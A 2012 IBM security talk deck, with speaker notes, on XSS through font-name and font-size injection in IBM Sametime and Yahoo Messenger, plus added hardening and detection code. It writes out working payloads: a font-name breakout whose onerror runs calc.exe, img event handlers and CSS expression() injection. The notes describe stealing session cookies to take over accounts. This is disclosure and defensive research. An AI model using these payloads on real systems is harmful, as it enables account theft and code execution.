© 2012 IBM Corporation
IBM Security Systems
Stylish XSS
via Font Name Injection
Background - Instant Messengers
Background - Instant Messengers
<Text Style="
font-family:Segoe UI;
font-weight:bold;
font-style:italic;
color:#008000;
">Hi!</Text>
Background - Instant Messengers
Every time I’ve seen this screen, I wondered
“What if I could use some HTML here…”
Background - Windows Fonts
Windows accepts basically any character as
part of the font name
Font name length limited to ~30 chars
IBM Lotus SameTime Messenger
<span style="font-size:14pt;font-family:Segoe UI;
font-weight:normal;font-style:normal;">You Do!</span>
SameTime - Exploit - CSS
Font Name: expression(alert(1));
SameTime - Exploit - CSS
Font Name: expression(alert(1));
Desired output:
<span style= ";font-family:expression(alert(1));…">
Actual output:
<span style="">
SameTime - Exploit - New Attribute
Font Name: "onclick="alert(1)"
Desired output:
<span style="font-size:9pt;font-family:"
onclick="alert(1)" ...">
Actual output:
<span style="font-size:9pt;font-family:"
onclick="">
SameTime - Exploit
~50 Fonts Later
SameTime - Exploit - Found
Message sent:
<span style="…font-family:
Message Received:
<span style="…font-family:
SameTime - Exploit - Found
Message sent:
<span style="…font-family:e0"
<<style<style</style>img x='>
Message Received:
<span style="…font-family:
SameTime - Exploit - Found
Message sent:
<span style="…font-family:e0"
<<style<style</style>img x='>
Message Received:
<span style="…font-family:e0">
<img x='>
SameTime - Exploit - Found
Message sent:
<span style="…font-family:e0"
<<style<style</style>img x='>Rest of Orig CSS">
Message Received:
<span style="…font-family:e0">
<img x='>Rest of Orig CSS">
SameTime - Exploit - Found
Message sent:
<span style="…font-family:e0"
<<style<style</style>img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:windowssystem32calc.exe" '
Message Received:
<span style="…font-family:e0">
<img x='>Rest of Orig CSS">
SameTime - Exploit - Found
Message sent:
<span style="…font-family:e0"
<<style<style</style>img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:windowssystem32calc.exe" '
</span>
Message Received:
<span style="…font-family:e0">
<img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:windowssystem32calc.exe" '
</span>
SameTime – Remote Code Execution
<span style="font-size:14pt;font-family:e0">
<img x=';font-weight:normal;font-style:normal;">' src='x'
onerror='location="c:windowssystem32calc.exe"'</span>
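The Sametime slides above show a client that copies the sender's chosen font name straight into the style attribute of a span, so a double quote in the font name closes the attribute and whatever follows is parsed as markup. The Python below is an added example for this deck, not Sametime's code: it reconstructs that vulnerable string-building pattern next to a hardened version that allowlists the font name and HTML-escapes everything placed into the attribute. The allowlist regex, the 32-character cap (chosen because the slides mention a ~30-character Windows limit), the size bounds and the fallback font are assumptions, and the injected font name is the attribute-breaking prefix shown on the slides, used here as constructed test input.

```python
import html
import re

# Vulnerable pattern, reconstructed from the rendered markup on the slides
# (not Sametime's own code): the font name is concatenated into the attribute.
def render_vulnerable(text: str, font_name: str, size_pt: int = 14) -> str:
    return ('<span style="font-size:%dpt;font-family:%s;font-weight:normal;'
            'font-style:normal;">%s</span>' % (size_pt, font_name, text))

# Assumed allowlist: a font family name is letters, digits, spaces and a few
# punctuation characters, at most 32 characters. Anything else gets the default.
FONT_NAME_RE = re.compile(r'^[A-Za-z0-9][A-Za-z0-9 ._-]{0,31}$')
DEFAULT_FONT = 'Segoe UI'   # assumed fallback

def safe_font_name(font_name: str) -> str:
    """Return the font name if it passes the allowlist, else the default."""
    return font_name if FONT_NAME_RE.match(font_name) else DEFAULT_FONT

def render_hardened(text: str, font_name: str, size_pt: int = 14) -> str:
    """Hardened builder: validated font name, bounded numeric size, and
    HTML attribute escaping as a second layer in case the allowlist is ever
    loosened. html.escape(quote=True) also encodes both quote characters,
    so no value can terminate the style attribute."""
    family = safe_font_name(font_name)
    size = size_pt if 6 <= size_pt <= 72 else 14   # assumed bounds
    return ('<span style="font-size:%dpt;font-family:%s;font-weight:normal;'
            'font-style:normal;">%s</span>'
            % (size, html.escape(family, quote=True),
               html.escape(text, quote=True)))

STYLE_ATTR_RE = re.compile(r'style="([^"]*)"')

def style_attr_value(markup: str) -> str:
    """Return the style attribute value as an HTML parser would see it, i.e.
    everything up to the first double quote. Used to show where the
    vulnerable builder's attribute actually ends."""
    m = STYLE_ATTR_RE.search(markup)
    return m.group(1) if m else ''

# Constructed test input: the font-name prefix from the slides, which closes
# the attribute with a quote, and a benign font name for comparison.
INJECTED_FONT = 'e0"<<style<style</style>img x=\'>'
BENIGN_FONT = 'Segoe UI'

if __name__ == '__main__':
    print(style_attr_value(render_vulnerable('Hi!', INJECTED_FONT)))
    print(render_hardened('Hi!', INJECTED_FONT))
```

With the vulnerable builder the style attribute ends at `font-family:e0` and the rest of the font name becomes markup; the hardened builder rejects the name at the allowlist, and even a name that passed would be entity-encoded before it could close the attribute.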
Yahoo Messenger
Yahoo Messenger – Message View
Lots of Colors, but that’s about it…
Yahoo Messenger - History View
Yahoo Messenger - History View
Finally, Yahoo's
purple alert!
Yahoo Messenger - The Payload
<img src="x"onmouseover="alert(1)">
Yahoo Messenger - Digging Deeper
Wait, what?
It's not local?!
Yahoo Messenger - Digging Deeper
Accessing this URL in Chrome yields the same result.
Yahoo Messenger - Digging Deeper
That means I can read the cookie!
And steal your account!
Yahoo Messenger - Recap
1. Send the victim a message that contains a malicious
HTML snippet
2. Wait 3-4 hours for it to show up in the history
3. Convince the user to access his history, or send him
a direct link to it (after all, it's not local)
4. Have the victim click the Instant Message from the
drop-down box
Yahoo Messenger - Introducing: Web Messenger!
Finally I can see the results of my attacks in
real time!
Yahoo Messenger - Web Messenger
During the tests, I noticed that a <Font> tag
sent as part of the message text is rendered
differently in the Web Messenger.
• The message:
<font face="xxx" size="20">33333</font>
• Was rendered as:
<font style="font-size:20pt" face="xxx"
id="yui_3_2_0_20_1330267588862427">33333</font>
Yahoo Messenger - Exploiting CSS
Add a new rule with an expression() call.
Yahoo Messenger - Exploiting CSS
Started With:
<font face=ssss size="1&color:red">xxxx</font>
To my surprise the response came back as I hoped
<font style="font-size:1&amp;color:red" >xxxx</font>
Yahoo Messenger - Exploiting CSS
Next was the expression:
<font face=sssss size="1&color:expression(alert(1))"
>xxxx</font>
And again, it seems like nothing is filtering this...
<font style="font-size:1&amp;color:expression(alert(1))"
>xxxx</font>
Yahoo Messenger - Exploiting CSS
Time to open Internet Explorer!
Yahoo Web Messenger - IE Version
The Rules (for IE):
1. The Size attribute must be surrounded by
double-quotes (" ")
2. The size value must be followed by the "pt;"
suffix
<font size="15pt;"> <font style="font-size=15pt;">
Yahoo Web Messenger - IE Version
By tweaking the size value,
a new Font-Family CSS rule could be injected.
<font size="15pt;font-family:aaaa;">
<font style="font-size=15pt;font-family: aaaa;">
Yahoo Web Messenger - IE Version
With all that in mind, and ~30 <Font> tags later,
came the following payload, which bypasses the
CSS filtering
<font size="15pt;font-family:expression(alert(1));">
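The Yahoo Web Messenger chain, from the "1&color:red" probe through the IE payload above, comes down to one server-side habit: the size attribute of a <font> tag is copied verbatim into a font-size declaration, so a separator in the value smuggles in extra declarations. The Python below is an added example for this deck, not Yahoo's code: canonical_font_size is the server-side fix (parse the size as a bounded number and re-emit it, so there is nothing to smuggle), and style_findings is a detection routine that inspects the inline styles of already-rendered messages and reports anything that does not look like the server's own single font-size declaration. The allowed-property set, the size bounds, the dangerous-value pattern and the sample markup are constructed assumptions modelled on the rendered markup shown on the slides.

```python
import html
import re

STYLE_RE = re.compile(r'style="([^"]*)"')
SIZE_RE = re.compile(r'^\s*(\d{1,3})\s*(pt)?\s*$')
# Assumed list of things that never belong in a font-size value coming from
# a chat message. expression( is the IE CSS-expression hook used on the slides.
DANGEROUS_VALUE_RE = re.compile(r'expression\s*\(|url\s*\(|javascript:|\\|@import', re.I)
ALLOWED_PROPS = {'font-size'}   # assumed: the server only ever emits font-size

def canonical_font_size(raw: str):
    """Server-side fix: accept only a plain number (optionally 'pt') within
    assumed bounds and rebuild the declaration value from the parsed integer.
    Returns e.g. '15pt', or None for anything else, so '15pt;font-family:x'
    is rejected rather than copied through."""
    m = SIZE_RE.match(raw)
    if not m:
        return None
    n = int(m.group(1))
    return '%dpt' % n if 1 <= n <= 72 else None

def style_findings(markup: str):
    """Detection: list what is wrong with every inline style in a rendered
    message. An empty list means each style is a single well-formed
    font-size declaration, which is all the server is expected to produce."""
    findings = []
    for raw_style in STYLE_RE.findall(markup):
        style = html.unescape(raw_style)   # &amp; -> & as the browser sees it
        for decl in filter(None, (d.strip() for d in style.split(';'))):
            prop, sep, value = decl.partition(':')
            prop = prop.strip().lower()
            if not sep or prop not in ALLOWED_PROPS:
                findings.append('unexpected declaration: %s' % decl)
            if DANGEROUS_VALUE_RE.search(value):
                findings.append('dangerous value: %s' % decl)
            if sep and prop == 'font-size' and canonical_font_size(value) is None:
                findings.append('malformed font-size: %s' % decl)
    return findings

# Constructed samples modelled on the rendered markup from the slides.
SAMPLES = {
    'benign': '<font style="font-size:20pt" face="xxx">33333</font>',
    'amp':    '<font style="font-size:1&amp;color:expression(alert(1))">xxxx</font>',
    'semi':   '<font style="font-size:15pt;font-family:expression(alert(1));">x</font>',
}

if __name__ == '__main__':
    for name, markup in SAMPLES.items():
        print(name, style_findings(markup))
```

Running the detector over the three samples reports nothing for the benign message, two findings for the "&" variant (a dangerous value and a malformed size, since "&" is not a CSS separator and the whole string stays one declaration) and two for the ";" variant (an unexpected font-family declaration carrying a dangerous value). The fix side is deliberately strict: canonical_font_size never echoes the input string, only an integer it parsed.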
Yahoo Web Messenger - IE Version
It should work correctly according to the rendered source in
IE Developer Tools
Yahoo Web Messenger - IE Version
Yet somehow, no alert
Yahoo Web Messenger - Uber Meta!
After ~5 hours of more fiddling and long lonely IM chats
with myself
I finally found out what I was afraid of.
Or in other words, The "No Expression For You" Meta Tag
<meta http-equiv="X-UA-Compatible" content="IE=8"/>
Yahoo Web Messenger - Going Old School
Fired up my Windows XP VM
and kicked out IE8
Yahoo Web Messenger - Finally
Yahoo Messenger - History Window
Questions?

Columbus Data & Analytics Wednesdays - June 2024
 
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
 
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge GraphGraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
 
Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...
Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...
Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...
 
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
 

Stylish XSS

  • 1. © 2012 IBM Corporation, IBM Security Systems. Stylish XSS via Font Name Injection
  • 2. Background - Instant Messengers
  • 3. Background - Instant Messengers. <Text Style="font-family:Segoe UI; font-weight:bold; font-style:italic; color:#008000;">Hi!</Text>
  • 4. Background - Instant Messengers. Every time I've seen this screen, I wondered "What if I could use some HTML here…"
  • 5. Background - Windows Fonts. Windows accepts basically any character as part of the font name. Font name length is limited to ~30 chars (LOGFONT's lfFaceName holds LF_FACESIZE = 32 characters including the terminator).
  • 6. IBM Lotus SameTime Messenger. <span style="font-size:14pt;font-family:Segoe UI;font-weight:normal;font-style:normal;">You Do!</span>
  • 7. SameTime - Exploit - CSS. Font Name: expression(alert(1));
  • 8. SameTime - Exploit - CSS. Font Name: expression(alert(1)); Desired output: <span style=";font-family:expression(alert(1));…"> Actual output: <span style="">
  • 9. SameTime - Exploit - New Attribute. Font Name: "onclick="alert(1)" Desired output: <span style="font-size:9pt;font-family:" onclick="alert(1)" ..."> Actual output: <span style="font-size:9pt;font-family:" onclick="">
  • 10. SameTime - Exploit. ~50 fonts later
  • 11. SameTime - Exploit - Found. Message sent: <span style="…font-family: Message received: <span style="…font-family:
  • 12. SameTime - Exploit - Found. Message sent: <span style="…font-family:e0" <<style<style</style>img x='> Message received: <span style="…font-family:
  • 13. SameTime - Exploit - Found. Message sent: <span style="…font-family:e0" <<style<style</style>img x='> Message received: <span style="…font-family:e0"> <img x='>
  • 14. SameTime - Exploit - Found. Message sent: <span style="…font-family:e0" <<style<style</style>img x='>Rest of Orig CSS"> Message received: <span style="…font-family:e0"> <img x='>Rest of Orig CSS">
  • 15. SameTime - Exploit - Found. Message sent: <span style="…font-family:e0" <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:\windows\system32\calc.exe"' Message received: <span style="…font-family:e0"> <img x='>Rest of Orig CSS">
  • 16. SameTime - Exploit - Found. Message sent: <span style="…font-family:e0" <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:\windows\system32\calc.exe"' </span> Message received: <span style="…font-family:e0"> <img x='>Rest of Orig CSS">' src='x' onerror='location="c:\windows\system32\calc.exe"' </span>
  • 17. SameTime – Remote Code Execution. <span style="font-size:14pt;font-family:e0"> <img x=';font-weight:normal;font-style:normal;">' src='x' onerror='location="c:\windows\system32\calc.exe"'</span>
  • 18. Yahoo Messenger
  • 19. Yahoo Messenger – Message View. Lots of colors, but that's about it…
  • 20. Yahoo Messenger - History View
  • 21. Yahoo Messenger - History View
  • 22. Yahoo Messenger - History View. Finally, Yahoo's purple alert!
  • 23. Yahoo Messenger - The Payload. <img src="x"onmouseover="alert(1)">
  • 24. Yahoo Messenger - Digging Deeper. Wait, what? It's not local?!
  • 25. Yahoo Messenger - Digging Deeper. Accessing this URL in Chrome yields the same result.
  • 26. Yahoo Messenger - Digging Deeper. That means I can read the cookie! And steal your account!
  • 27. Yahoo Messenger - Recap. 1. Send the victim a message that contains a malicious HTML snippet 2. Wait 3-4 hours for it to show up in the history 3. Convince the user to access his history, or send him a direct link to it (after all, it's not local) 4. Have the victim click "Instant Message" in the drop-down box
  • 28. Yahoo Messenger - Introducing: Web Messenger! Finally I can see the results of my attacks in real time!
  • 29. Yahoo Messenger - Web Messenger. During the tests, I noticed that a <Font> tag sent as part of the message text is rendered differently in the Web Messenger. • The message: <font face="xxx" size="20">33333</font> • Was rendered as: <font style="font-size:20pt" face="xxx" id="yui_3_2_0_20_1330267588862427">33333</font>
  • 30. Yahoo Messenger - Exploiting CSS. Add a new rule with an expression() call.
  • 31. Yahoo Messenger - Exploiting CSS. Started with: <font face=ssss size="1&color:red">xxxx</font> To my surprise, the response came back as I hoped: <font style="font-size:1&amp;color:red">xxxx</font>
  • 32. Yahoo Messenger - Exploiting CSS. Next was the expression: <font face=sssss size="1&color:expression(alert(1))">xxxx</font> And again, it seems like nothing is filtering this... <font style="font-size:1&amp;color:expression(alert(1))">xxxx</font>
  • 33. Yahoo Messenger - Exploiting CSS. Time to open Internet Explorer!
  • 34. Yahoo Web Messenger - IE Version
  • 35. Yahoo Web Messenger - IE Version. The rules (for IE): 1. The size attribute must be surrounded by double quotes (" ") 2. The size value must be followed by the "pt;" suffix. <font size="15pt;"> becomes <font style="font-size=15pt;">
  • 36. Yahoo Web Messenger - IE Version. By tweaking the size value, a new font-family CSS rule could be injected. <font size="15pt;font-family:aaaa;"> becomes <font style="font-size=15pt;font-family: aaaa;">
  • 37. Yahoo Web Messenger - IE Version. With all that in mind, and ~30 <Font> tags later, came the following payload that bypasses the CSS filtering: <font size="15pt;font-family:expression(alert(1));">
  • 38. Yahoo Web Messenger - IE Version. It should work correctly according to the rendered source in IE Developer Tools
  • 39. Yahoo Web Messenger - IE Version. Yet somehow, no alert
  • 40. Yahoo Web Messenger - Uber Meta! After ~5 hours of more fiddling and long lonely IM chats with myself, I finally found what I was afraid of. Or in other words, the "No Expression For You" meta tag: <meta http-equiv="X-UA-Compatible" content="IE=8"/>
  • 41. Yahoo Web Messenger - Going Old School. Fired up my Windows XP VM and kicked out IE8
  • 42. Yahoo Web Messenger - Finally
  • 43. Yahoo Messenger - History Window
  • 44. Questions?
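The two-field SameTime payload of slides 10 to 17 depends on a server filter that strips a `<style…</style>` pair exactly once, which is why an `img` hidden behind a doubly nested `<<style<style</style>` survives, and on the font name dragging the rest of the template into an `x='…'` attribute that the message text then closes. The JavaScript below is an added example written for this page, not code from the slides or from IBM: it models the template from slide 6, a hypothetical single-pass filter (the real SameTime filter is not described on the page beyond the note that it deletes the `<style<style</style` part), the assembled markup, and a hardened renderer that allowlists the font name and encodes it for the CSS-string-inside-HTML-attribute context it lands in. `alert(1)` stands in for the slides' calc.exe payload, and the `">` after `e0` is taken from slide 17's rendered output.

```javascript
"use strict";
// Added example for this page, not code from the slides or from IBM/SameTime.
// It models the two-field font-name injection of slides 10-17 and a hardened
// renderer. HYPOTHETICAL parts: the vulnerable filter (reconstructed as a
// single-pass regex that removes one <style...</style> pair), and alert(1)
// standing in for the slides' calc.exe payload.

// Template the client wraps each message in (slide 6, size/weight fixed here).
function renderMessage(fontName, text, sanitizeFont) {
  return `<span style="font-size:14pt;font-family:${sanitizeFont(fontName)};` +
         `font-weight:normal;font-style:normal;">${text}</span>`;
}

// Vulnerable filter (hypothetical): strips <style...</style> exactly once.
// Removing the inner "<style<style</style>" exposes the "<" hidden before it,
// so "<<style<style</style>img" collapses to "<img".
function naiveStripStyle(value) {
  return value.replace(/<style[\s\S]*?<\/style>/gi, "");
}

// Attacker-controlled fields. The font name ends the style attribute and the
// span start tag (the '">' is what slide 17's output shows), then opens
// <img x=' so the rest of the template is swallowed by the x='...' value.
// 31 characters, within the ~30-char Windows font-name limit from slide 5.
const EVIL_FONT = `e0"><<style<style</style>img x='`;
// The message text closes x='...' and supplies src/onerror (slides 15-16).
const EVIL_TEXT = `' src='x' onerror='alert(1)'`;

function vulnerableRender() {
  return renderMessage(EVIL_FONT, EVIL_TEXT, naiveStripStyle);
}

// Hardened path: allowlist the font name, then encode for both contexts the
// value crosses (a CSS string that lives inside an HTML attribute), and
// HTML-encode the message text as ordinary text content.
const FONT_NAME_RE = /^[A-Za-z0-9][A-Za-z0-9 _.-]{0,30}$/; // LF_FACESIZE-1 = 31

function cssString(s) {
  // Quote as a CSS string and hex-escape anything outside the allowlist,
  // which covers quotes, ';', '(', ')', '<', '>' and backslashes.
  const escaped = s.replace(/[^A-Za-z0-9 _.-]/g,
    c => "\\" + c.charCodeAt(0).toString(16) + " ");
  return `"${escaped}"`;
}

function htmlEscape(s) {
  return s.replace(/&/g, "&amp;").replace(/"/g, "&quot;")
          .replace(/'/g, "&#39;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

function safeFont(fontName) {
  if (!FONT_NAME_RE.test(fontName)) return "sans-serif"; // reject, fall back
  return htmlEscape(cssString(fontName));
}

function hardenedRender() {
  return renderMessage(EVIL_FONT, htmlEscape(EVIL_TEXT), safeFont);
}

// Structural check on the result. A plain regex would stop at the '>'
// trapped inside x='...', so this scanner honours quoted attribute values
// the way an HTML tokenizer does.
function tagBody(html, tagName) {
  const start = html.search(new RegExp(`<${tagName}\\b`, "i"));
  if (start < 0) return null;
  let quote = null;
  for (let i = start; i < html.length; i++) {
    const c = html[i];
    if (quote) { if (c === quote) quote = null; }
    else if (c === '"' || c === "'") quote = c;
    else if (c === ">") return html.slice(start, i);
  }
  return html.slice(start); // unterminated tag; browsers close it at EOF
}

function hasInjectedHandler(html) {
  const body = tagBody(html, "img");
  return body !== null && /\bonerror\s*=/i.test(body);
}

console.log("vulnerable:", vulnerableRender());
console.log("hardened:  ", hardenedRender());
```

Run it with `node` to see both renderings side by side. The design point is that the fix is not a better blocklist: running the same strip-once filter a second time would close this particular payload and open the next, whereas allowlisting the font name and encoding it for the context it lands in makes the quote, the `>` and the `<img` inert regardless of how they were smuggled in.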

Editor's Notes

  1. Who am I? This presentation is going to show an idea I had and how I leveraged this idea into 3 vulnerabilities in the major IM clients. One of them will not be disclosed today because it has not yet been patched; it will be published on our blog once it is patched.
  2. Explain how IMs work. Talk about: the message window is actually a browser; the user's text message is wrapped in an HTML\XML template containing the following fields; the message is sent and then rendered as HTML\XML in the client's browser. It accepts parameters dictating: color, font name, font weight, font style, and more. (Translated from Hebrew:) Let's talk about IMs and set aside for a moment all the video, sound and file-transfer functionality and so on, leaving only the message-sending aspect. If we try to map the ways we have to send input into the system, we end up with something like the example.
  3. Same as 2.
  4. To configure all these settings, these apps usually come with a screen like this one. Every time I've seen this screen, I wondered "what if I could use some HTML here…"
  5. And apparently, you can! Windows fonts: all chars are valid; max 30 chars in every font name.
  6. Explain that the font we change goes into this template and is then sent out. Talk about possibilities of exploits: 1. Expression 2. Get out of the span tag 3. Get out to the HTML main context
  7. Starting off with expression.
  8. The server actually filtered everything in the CSS.
  9. Moving to the next payload: getting out of the style attr and into a new onclick attr. Results in the onclick being empty. No good.
  10. Two-field attack. First field (Font Name): 1. Filter deletes the <style<style</style part 2. We are left with e0"><img x='… which opens a new IMG tag with an X attribute (using a single quote). Second field (Message Text): 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocating the window to an EXE/BAT file 4. File will be executed
  11–15. Same as 10.
  16. Second line shows the trapped CSS in the X parameter. Calc executed example.
  17. Yahoo. No history found in the local FS, meaning the template is unknown. Messages sent take about 3–4 hours to register in the history. That means that every time I wanted to test anything, I had to wait 3–4 hours for the results and only then tweak my payloads and resend everything…
  18. The message view seems to sanitize input well; all messages sent managed to do nothing more than pretty colors. Taking into account that every test takes 3 hours, I decided it's best to move on and open the history.
  19. Looks a bit better but still, nothing interesting…
  20. The next step I took was to change the history filter to "Instant Messages".
  21. Boom. Endless pop-ups popped up… Apparently a lot of my tests worked…
  22. I isolated the simplest payload that worked and we can now move on and get some info such as: user agent, privileges, etc…
  23. Digging deeper got us the browser type (IE) and the location of the page, which is an internet address.
  24. So I tried accessing this page using Chrome, and as long as I was logged in to Yahoo! it got me the same results!
  25. The next thing I found was the cookie. Apparently, Yahoo doesn't like to use HttpOnly cookies, so stealing the cookie actually means stealing the account!
  26. Send message. Wait 3–4h. Social-engineer the user into opening the History. Have the user click on the Instant Messages context menu.
  27. No more 3-hour tests. I can now send a message and see it on the web messenger immediately. I now know the template.
  28. I sent the first line of code; the web messenger rendered the second line of code. Changes: added a new ID attribute: we don't care! Transformed the Size attribute into a CSS font-size property: very interesting!
  29. First, I tried to inject a new color:red statement, using the & -> &amp; encoding in order to terminate the CSS rule and inject a new one. And that worked without a glitch.
  30. Tried the same with an expression call, and all seems well.
  31. Opening IE. But no alert… After digging a little deeper:
  32. Different sanitizer per browser. Found an older message that has similar behavior. Worked on that example till I found some guidelines for the transformation on IE.
  33. Talk about the two rules of transformation.
  34. Using these guidelines I attempted a new rule injection.
  35. Payload found: new rule injected. Explain the CSS encoding trick.
  36. Everything looks good in IE.
  37. Somehow, no alert.
  38. Goddamn meta tag. But this meta tag doesn't work in IE<8.
  39. VM. Kick off IE8.
  40. Entered the same URL with IE 7 and the alert shows up.
  41. Also in the original History view of the messenger, which actually uses the installed IE.
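The Yahoo Web Messenger rewrite of `<font size="…">` into an inline style (slides 29, 31 and 35 to 37, notes 28 to 35) is a different bug class from the SameTime breakout: the value never leaves the `style` attribute, a `;` simply ends the `font-size` declaration and starts one the sender chose. The JavaScript below is an added example for this page, not Yahoo's code: `naiveRewrite` is a hypothetical reconstruction of an unvalidated copy of the size value, `declarations` shows what the CSS parser makes of the result, and `hardenedRewrite` validates the size first and builds the CSS itself. The legacy-size-to-points table is an assumption. Whether `expression()` then runs depends on the document mode, as slide 40's `X-UA-Compatible` meta tag shows; that part of the story cannot be reproduced outside IE.

```javascript
"use strict";
// Added example for this page, not Yahoo's code. It models the <font size>
// to inline-style rewrite observed in slides 29-37, shows what the CSS parser
// makes of the result, and gives a validated rewrite. HYPOTHETICAL parts: the
// rewrite itself (reconstructed as an unvalidated copy of the size value) and
// the legacy-size-to-points table.

const FONT_TAG_RE = /<font\b([^>]*?)\s+size="([^"]*)"([^>]*)>/gi;

// Vulnerable (hypothetical reconstruction): whatever is in size="" is copied
// verbatim into the style attribute. The value never leaves the attribute,
// but a ';' ends the font-size declaration and starts one the sender chose.
function naiveRewrite(html) {
  return html.replace(FONT_TAG_RE, (m, before, size, after) =>
    `<font style="font-size:${size}"${before}${after}>`);
}

// Extract the style value and split it the way a CSS parser would, into
// property/value pairs. Deliberately minimal: no strings or nested ';'.
function styleOf(html) {
  const m = /\bstyle="([^"]*)"/i.exec(html);
  return m ? m[1] : "";
}
function declarations(style) {
  return style.split(";").map(d => d.trim()).filter(Boolean).map(d => {
    const i = d.indexOf(":");
    return i < 0 ? [d, ""] : [d.slice(0, i).trim(), d.slice(i + 1).trim()];
  });
}

// A blocklist for expression() is a weak control on its own: IE also honours
// comment splits such as expr/**/ession and CSS hex escapes. It is kept here
// only as a detector for the check below; the fix is to validate the value.
function hasExpression(style) {
  return declarations(style).some(([, v]) => /expression\s*\(/i.test(v));
}

// Hardened rewrite: accept the legacy 1-7 size (clamped, mapped through a
// hypothetical points table) or a plain pt/px length; build the CSS from
// those parts and drop the size entirely otherwise.
const LEGACY_SIZE_PT = { 1: 8, 2: 10, 3: 12, 4: 14, 5: 18, 6: 24, 7: 36 };

function safeFontSize(size) {
  const s = size.trim();
  if (/^\d{1,2}$/.test(s)) {
    const n = Math.min(Math.max(parseInt(s, 10), 1), 7);
    return `${LEGACY_SIZE_PT[n]}pt`;
  }
  const m = /^(\d{1,3}(?:\.\d+)?)(pt|px)$/i.exec(s);
  return m ? `${m[1]}${m[2].toLowerCase()}` : null;
}

function hardenedRewrite(html) {
  return html.replace(FONT_TAG_RE, (m, before, size, after) => {
    const css = safeFontSize(size);
    return css ? `<font style="font-size:${css}"${before}${after}>`
               : `<font${before}${after}>`;
  });
}

// Slide 37's payload and slide 29's benign message, as constructed inputs.
const PAYLOAD = `<font size="15pt;font-family:expression(alert(1));">xxxx</font>`;
const BENIGN  = `<font face="xxx" size="20">33333</font>`;

console.log("naive   :", naiveRewrite(PAYLOAD), declarations(styleOf(naiveRewrite(PAYLOAD))));
console.log("hardened:", hardenedRewrite(PAYLOAD), hardenedRewrite(BENIGN));
```

The same validate-then-build rule covers the `1&color:red` variant of slide 31: once the browser decodes `&amp;` back to `&`, the value is again something the CSS parser is free to reinterpret, and only a size that was checked to be a number or a length before the style string was assembled is safe to emit.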